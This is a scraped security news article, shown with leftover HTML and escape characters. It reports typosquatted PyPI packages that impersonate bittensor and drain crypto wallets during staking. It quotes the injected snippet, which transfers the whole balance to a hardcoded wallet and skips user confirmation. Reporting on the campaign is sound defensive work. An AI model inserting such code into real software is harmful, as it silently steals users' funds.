Threat Actors Using Typosquatted PyPI Packages to Steal Cryptocurrency from Bittensor Wallets
\n \t
\n
<\/BR>
\n
\n \t
\n
<\/BR><\/p>\n
A sophisticated cryptocurrency theft campaign has emerged targeting the Bittensor ecosystem through malicious Python packages distributed via the Python Package Index (PyPI).<\/p>\n
The attack leverages typosquatting techniques to deceive developers and users into installing compromised versions of legitimate Bittensor packages, ultimately resulting in complete wallet drainage during routine staking operations.<\/p>\n
The malicious campaign<\/a> was orchestrated with precision, with all five typosquatted packages published within a concentrated 25-minute window on August 6, 2025.<\/p>\n These packages included variations such as \u201cbitensor\u201d (missing \u2018t\u2019), \u201cbittenso\u201d (truncated), and \u201cqbittensor\u201d (prefixed), all designed to mimic the authentic bittensor and bittensor-cli packages.<\/p>\n The attackers strategically chose version numbers 9.9.4 and 9.9.5 to closely match legitimate package versions, maximizing the likelihood of accidental installation through developer typos or copy-paste errors.<\/p>\n GitLab analysts identified<\/a> the threat through their automated package monitoring system, which flagged suspicious activity related to popular Bittensor packages.<\/p>\n The discovery revealed a carefully engineered attack that exploits the trust inherent in routine blockchain<\/a> operations, specifically targeting users engaged in staking activities who typically possess substantial cryptocurrency holdings.<\/p>\n The attack\u2019s technical sophistication lies in its surgical modification of legitimate staking functionality within the At line 275, the attackers inserted malicious code that completely subverts the expected staking process:-<\/p>\n This code injection operates with devastating efficiency by setting The hardcoded destination wallet address serves as a collection point for stolen funds, which are subsequently distributed through a multi-hop laundering network<\/a> involving several intermediary wallets before reaching the final consolidation address.<\/p>\n Equip your SOC with full access to the latest threat data from\u00a0ANY.RUN TI Lookup<\/strong>\u00a0that can Improve incident response ->\u00a0Get 14-day\u00a0Free\u00a0Trial<\/a><\/strong><\/p>\n The post Threat Actors Using Typosquatted PyPI Packages to Steal Cryptocurrency from Bittensor Wallets<\/a> appeared first on Cyber Security News<\/a>.<\/p>\n<\/div>\nAnalysis of the Hijacked Staking Mechanism<\/strong><\/h2>\n
stake_extrinsic<\/code> function located in bittensor_cli\/src\/commands\/stake\/add.py<\/code>.<\/p>\nresult = await transfer_extrinsic(\n subtensor=subtensor,\n wallet=wallet,\n destination=\"5FjgkuPzAQHax3hXsSkNtue8E7moEYjTgrDDGxBvCzxc1nqR\",\n amount=amount,\n transfer_all=True,\n prompt=False\n)<\/code><\/pre>\ntransfer_all=True<\/code> to drain entire wallets rather than just the intended staking amount, while prompt=False<\/code> bypasses user confirmation dialogs.<\/p>\n